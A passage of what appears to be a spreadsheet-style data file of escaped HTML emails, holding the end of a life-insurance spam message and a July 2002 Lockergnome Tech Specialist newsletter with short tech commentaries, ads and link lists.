 Assist in the payment of outstanding debt!&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td valign=3Dtop&gt;&lt;img src=3D"http://u-need-life-insurance.com/bullet.g=
 if" width=3D17 height=3D17 border=3D0 vspace=3D2&gt;&lt;/td&gt;&lt;td class=3Dtext&gt;&lt;b&gt;=
 Tax Benefit and Estate Protection&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D490 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td valign=3Dbottom align=3Dright&gt;&lt;br&gt;&lt;a href=3D"http://u-need-life-insura=
 nce.com/"&gt;&lt;br&gt;&lt;img src=3D"http://u-need-life-insurance.com/proceed.gif" wi=
 dth=3D167 height=3D28 border=3D0 alt=3D"click here" hspace=3D40&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D540 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td width=3D28&gt;&lt;img src=3D"http://u-need-life-insurance.com/rnd1.gif" widt=
 h=3D30 height=3D28 border=3D0&gt;&lt;/td&gt;
 &lt;td width=3D484 align=3Dleft background=3D"http://u-need-life-insurance.co=
 m/bottom_bg.gif" class=3Dfooter&gt;&lt;a href=3D"http://u-need-life-insurance.co=
 m/etc/privacy.htm" class=3Dfooter&gt;Privacy&lt;/a&gt; | &lt;a href=3D"http://u-need-l=
 ife-insurance.com/etc/unsubscribe.htm" class=3Dfooter&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D28&gt;&lt;img src=3D"http://u-need-life-insurance.com/rnd2.gif" widt=
 h=3D30 height=3D28 border=3D0&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020718.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020718.html
       &lt;/a&gt;
       To unsubscribe, simply reply to this e-mail message.
       To resubscribe, visit our site: http://www.lockergnome.com/
       Don't worry about anything else below this paragraph.
       It's for those with HTML e-mail clients. Just go to
       the above listed web address to view this issue
       perfectly in your web browser. Thanks again! --&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
  body      { BACKGROUND-IMAGE: url(http://images.lockergnome.com/images/issue/top-right.gif); color: #331F30 }
  a:link    { COLOR: #331F30; TEXT-DECORATION: underline; font-weight: normal }
  a:visited { COLOR: #331F30; TEXT-DECORATION: underline; font-weight: normal }
  a:active  { COLOR: GRAY; text-decoration: none }
  a:hover   { color: GRAY; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #C69EBF; BORDER-BOTTOM: #4F2F4A 4px solid; BORDER-LEFT: #E7D5E4 4px solid; BORDER-RIGHT: #4F2F4A 4px solid; BORDER-TOP: #E7D5E4 4px solid; COLOR: #331F30; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #E7D5E4; BORDER-BOTTOM: #C69EBF 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #C69EBF 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #331F30; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center } 
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020718 Lockergnome Tech Specialist&lt;/title&gt;&lt;/head&gt;
 &lt;body   MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"   style="BACKGROUND-POSITION: right top; BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" background="http://www.lockergnome.com/images/issue/top-right-2.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://images.lockergnome.com/images/issue/top-left.gif" nowrap valign="middle" align="center" colspan="2"&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;center&gt;
 &lt;a href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;
  &lt;br&gt;
  &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;
 &amp;nbsp; 07.18.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Keep your Web site working fast and smart with UltraDNS.&lt;/b&gt; More reliable
 performance means more traffic, more sales, and more profits. Outsource your
 DNS management and save. Basic DNS for only $1.00 a month. 
 &lt;a href="http://servedby.advertising.com/click/site=64021/mnum=63761"&gt;Click here to
 find out more&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I thought I baked my Dell PowerEdge 1400SC server yesterday 
 when it refused to boot completely. I borrowed a data vac 
 from a friend and decided to clean all of the dust and cat 
 hair from my systems, then after reconnecting everything, 
 the server would boot to the initial splash screen, where 
 there is a POST progress bar, but would not proceed past 
 past about the first 1/5th of the bar. Uh-oh. What did I 
 fry?
 &lt;p&gt;As it turns out, it was another case of "always check the 
 small stuff". Oh, I had all of the cables plugged back in to 
 the server properly, I checked all of that, but it didn't 
 dawn on me until about a half dozen boot attempts later that 
 I should probably turn an eye toward the other end of the 
 cables. That server is connected to an 8-port Compaq KVM 
 switch and with all of the yanking, plucking and shuffling, 
 the keyboard cable had been eeked out of the switch just a 
 tad. Why the server didn't display a keyboard warning 
 message like every other computer on the planet, I can only 
 attribute to the BIOS developers. Server Satchel, running 
 Red Hat Linux 7.2 is now operating as it was previously. The 
 penguin is happy. The server case is even black. How 
 appropriate...
 &lt;p align="right"&gt;See You in &lt;a target="_blank" href="http://www.gnomedex.com/"&gt;August&lt;/a&gt;,&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&lt;font style="font-size: 23pt" face="Randy Nieland, Chris Pirillo, Comic Sans MS, Script" size="5"&gt;Randy Nieland&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;!-- GnomeNETWORK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeNETWORK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Windows XP Security Checklist&lt;/b&gt;
 &lt;br&gt;Finely crafted by Bernie Klinder
 &lt;p&gt;&lt;a class="url" href="http://www.labmice.net/articles/winxpsecuritychecklist.htm"&gt;http://www.labmice.net/articles/winxpsecuritychecklist.htm&lt;/a&gt;
 &lt;p&gt;With all of the security features crammed into Windows XP, 
 where does one start? Do you need VPN capability? Is NTFS an 
 appropriate file system choice for you? Is there any value 
 at all in Simple File Sharing? After much hounding, Bernie 
 Klinder has drawn up a healthy checklist of things you need 
 to address under Windows XP in order to maintain a system 
 that is both security and compatible with the rest of your 
 computing world.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;ATI Still Makes Video Cards?&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.anandtech.com/video/showdoc.html?i=1656"&gt;http://www.anandtech.com/video/showdoc.html?i=1656&lt;/a&gt;
 &lt;p&gt;Say it isn't so! Yes, apparently they do still have 
 something to say about NVIDIA's dominance in the video card 
 market. Seeing as how they've been all but dumped by the 
 majority of top-tier system makers, it's hard to believe 
 that they are capable of a serious comeback. Judging from 
 what AnandTech has to say about the forthcoming R300-based 
 cards, it appears that they haven't thrown in the towel just 
 yet. I'm all for competition, so I welcome the effective re-
 entrance into the high end market. Let's all hope that their 
 driver development has improved as much as their hardware 
 seems to have. 
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;GET WINDOWS XP TIPS:&lt;/b&gt; Months after the release of Windows XP Professional and Home editions, people are still learning the nuances of Microsoft's newest operating system. Whether you've been using it for a while or are planning to upgrade to the new OS soon, this ebook is right up your alley. 
 &lt;a href="   http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU3000768669&amp;AFFIDC=AFF669529939"&gt;GET YOUR COPY&lt;/a&gt; 
 of Lockergnome's Top 50 Windows XP tips now!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q292108"&gt;Q292108 - WD2002: GetSpellingSuggestions Method Does Not List Non-English Language Suggestions (Q292108)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q290981"&gt;Q290981 - WD2002: "File Conversion Encoding" Dialog Box Appears When You Open Text File (Q290981)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q290969"&gt;Q290969 - WD2002: Run-Time Error 5 When You Use Mid(), Left(), or Right() Function (Q290969)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q290967"&gt;Q290967 - WD2002: Cannot Place a Bullet in the Middle of a Sentence or Paragraph (Q290967)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q201953"&gt;Q201953 - WD2000: Macro to Find Automatic (Soft) Page Breaks (Q201953)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt; 
 &lt;!-- GnomeASSISTANT --&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeASSISTANT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Technical Censorship&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://news.com.com/2100-1023-944315.html"&gt;http://news.com.com/2100-1023-944315.html&lt;/a&gt;
 &lt;p&gt;Odd. I liked that cup of Mocha (spelled M-O-C-H-A and I'll explain in a minute) I drank at Starbucks when Jake and I visited last week, but if I wanted to relay that to someone using a Yahoo email account, you might see an alternate word. Thus the additional hyphenated spelling just in case those of you using Yahoo to subscribe to Lockergnome actually received your issues and the word has been altered to suit their personal opinion of my choice in drinks. They've also had a terrible time interpretting our W3C standardized HTML lately, dropping in copious #message references throughout the text in their new Beta email client. So why the text replacement? It's another filtering technique to stop certain words that might relate to JavaScript functions. I guess I'll have to choose another beverage next time. Silly me.
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Yer Kidding... Really?&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.theregus.com/content/4/25629.html"&gt;http://www.theregus.com/content/4/25629.html&lt;/a&gt;
 &lt;p&gt;I'm all sorts of sarcastic today, aren't I? Those of us 
 that have had to manage budgets are used to dealing with 
 math in terms of hardware, software, maintenance and 
 personnel costs. It's not really that difficult. It's 
 certainly not hard to see that dropping a free version of 
 Linux on a server with less hardware requirements just to do 
 some file sharing, printing and maybe an Intranet page or 
 three is far cheaper than using Windows. At very long last, 
 Microsoft has admitted as much. Of course, they're quick to 
 point out that they have much more to offer than Linux, 
 which may indeed be true. But at the end of the day, when 
 you compare donuts to donuts and like functions against one 
 another, Linux is cheaper. For a shop of Windows-trained 
 staff, dealing with Linux will certainly be a challenge, 
 requiring additional training, suffer the odd blunder here 
 and there, and be less forgiving when it comes to detailed 
 configuration. On the same token, make a Linux whiz use 
 Windows and see how quickly you'll be searching for a 
 replacement. Cheap is in the budget of the beholder.
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020718.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020718.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the &lt;A HREF="http://www.lockergnome.com/changesub.html"&gt;subscription management&lt;/A&gt; page. For further information, please refer to the GnomeCREDITS in the sidebar.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--#include virtual="/include/subscription2.txt" --&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td background="http://images.lockergnome.com/images/issue/sidebar.gif" VALIGN="top" align="left" width="145"&gt;&lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;LOOK OVER HERE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.gnometomes.com/"&gt;Download Tip eBooks&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://windowsdaily.lockergnome.com/"&gt;Latest Windows Daily&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://digitalmedia.lockergnome.com/"&gt;Latest Digital Media&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://techspecialist.lockergnome.com/"&gt;Latest Tech Specialist&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://penguinshell.lockergnome.com/"&gt;Latest Penguin Shell&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://applecore.lockergnome.com/"&gt;Latest Apple Core&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://webmasterweekly.lockergnome.com/"&gt;Latest Web Weekly&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://updates.lockergnome.com/"&gt;Latest Bits &amp;amp; Bytes&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://www.chrispirilloshow.com/"&gt;Latest Audio Show&lt;/A&gt;&lt;BR&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;A HREF="http://lockergnome.pricegrabber.com/"&gt;Low Price Search&lt;/A&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://www.gnomedex.com/"&gt;Our Tech Conference&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a target="_blank" href="http://www.gnometomes.com/tome/000628.html"&gt;Microsoft Office Tips&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" href="http://www.gnometomes.com/tome/000627.html"&gt;PC Productivity Tips&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" href="http://www.gnometomes.com/tome/000626.html"&gt;Cool Internet Tips&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" href="http://www.gnometomes.com/tome/000625.html"&gt;Windows 2000 Tips&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" href="http://www.gnometomes.com/tome/000623.html"&gt;Windows XP Tips&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://www.lockergnome.com/jobs.html"&gt;High-Tech Job Search&lt;/A&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/chat.html"&gt;Chat With Gnomies&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;Watch The Webcams&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="https://www.sandhills.com/secure/smartcomputing/cpufreetrial3.asp?source=cp491bonus"&gt;Computer Power User&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/issues/"&gt;Read Past Issues&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.xteq.com/"&gt;Download X-Setup&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/about.html"&gt;About Lockergnome&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/privacy.html"&gt;Our Privacy Policy&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/options.html"&gt;View More Options&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/lockergnome.xml"&gt;Our XML / RSS Feed&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/options.html#syndicate"&gt;Syndicate Our Tips&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/images/lockerlink.gif"&gt;Link To Lockergnome&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get Chris's Book&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#115;&amp;#117;&amp;#103;&amp;#103;&amp;#101;&amp;#115;&amp;#116;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;"&gt;&amp;#69;&amp;#45;&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#32;&amp;#97;&amp;#32;&amp;#83;&amp;#117;&amp;#103;&amp;#103;&amp;#101;&amp;#115;&amp;#116;&amp;#105;&amp;#111;&amp;#110;&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#114;&amp;#97;&amp;#110;&amp;#116;&amp;#114;&amp;#97;&amp;#118;&amp;#101;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;"&gt;&amp;#89;&amp;#111;&amp;#117;&amp;#114;&amp;#32;&amp;#82;&amp;#97;&amp;#110;&amp;#116;&amp;#32;&amp;#47;&amp;#32;&amp;#82;&amp;#97;&amp;#118;&amp;#101;&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#101;&amp;#101;&amp;#100;&amp;#98;&amp;#97;&amp;#99;&amp;#107;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Site Feedback"&gt;General Feedback&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;A HREF="http://www.furo.com/"&gt;The Editor's Blog&lt;/A&gt;&lt;BR&gt;
 &amp;nbsp;&lt;a href="&amp;#109;&amp;#97;&amp;#105;&amp;#108;&amp;#116;&amp;#111;&amp;#58;&amp;#102;&amp;#117;&amp;#114;&amp;#111;&amp;#64;&amp;#108;&amp;#111;&amp;#99;&amp;#107;&amp;#101;&amp;#114;&amp;#103;&amp;#110;&amp;#111;&amp;#109;&amp;#101;&amp;#46;&amp;#99;&amp;#111;&amp;#109;?subject=Lockergnome Tech Specialist Comment"&gt;E-mail the Editor&lt;/a&gt;&lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;SOUND SYSTEMS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=517946/"&gt;Yamaha RX-V1200&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=469475/"&gt;Sony DAVC900&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=533869/"&gt;Harman Kardon	AVR520&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=567695/"&gt;Denon	AVR5803&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=568577/"&gt;Pioneer VSXD811S&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=533871/"&gt;Pioneer Elite	VSX49TX&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=585097/"&gt;Sony HTDDW840&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=573619/"&gt;Yamaha HTR5560&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=527408/"&gt;BOSE LS122BK&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=585096/"&gt;Sony DAVC450&lt;/A&gt;&lt;BR&gt;
 &lt;/center&gt;
 &lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%" 
 bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMESPECIALS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Share your team/project contacts, calendars, tasks, etc. in MS Oulook 2002, without a server!" href="http://outlook.4team.biz/?fr=gnome"&gt;Manage Your Workgroup&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Software for filling in paper forms on your computer instead of a typewriter" href="http://www.colorpilot.com/typewriter.html"&gt;Form Pilot&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="It's both fun and functional! Hear the time, set alarms, style your taskbar clock, sync your PC time, and more. Try Say the Time free for
 30 days." href="http://www.provenio.ws/saythetime/"&gt;Say the Time 5.0&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Convert MP3, WAV, AVI, JPG, GIF, and PNG to the SWF format for no buffer streaming" href="http://www.gfx2swf.com/gnome-special/"&gt;Boomer - Stream Now&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Creating Web/CD catalogs with HyperPublish is really a snap! Not just an editor but a quick, powerful all-in-one environment for creating stunning catalogs, CDs and Web sites!" href="http://www.hyperpublish.com/create_a_catalog_000018.htm"&gt;Create Web/CD catalog&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Create your Web site in minutes with this easy-to-use visual tool!" href="http://www.easywebeditor.com/create_web_page_000004.htm"&gt;Easy Web Editor&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Capture TEXT seen in folder trees, file lists, database reports, dialog boxes, menus, status lines, including areas that you could not highlight with your mouse. (Chris cannot live without it!;)" href="http://www.structurise.com/kleptomania"&gt;Kleptomania&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Organize all your mp3 collection in seconds! You can rename mp3s quickly and easily, write tag information in batch, from file names or import it from cddb. Get your free trial now!" href="http://www.softpointer.com/tr_2.htm"&gt;Tag&amp;amp;Rename&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="You will enjoy countless hours of fun with Pretty Good Solitaire!  Play 500 solitaire card games, from classic games like Klondike, FreeCell, and Spider, to original games found nowhere else.  Enjoy lush graphics, large easy-to-read cards, statistics, and quests, a unique new way to play for points." href="http://www.goodsol.com/lockergnome.html"&gt;Pretty Good Solitaire&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a target="_blank" title="Choosing color combinations for the web is a careful balance between a scheme designed to draw attention; while being respectful of established color-harmony principles.  ColorCombo's four panels scroll, allowing side-by-side color comparisons.  Also text on background checker, 4096 color array, + more. FREE." href="http://www.colorcombo.com"&gt;Visualize Color Combos&lt;/a&gt;&lt;br&gt;
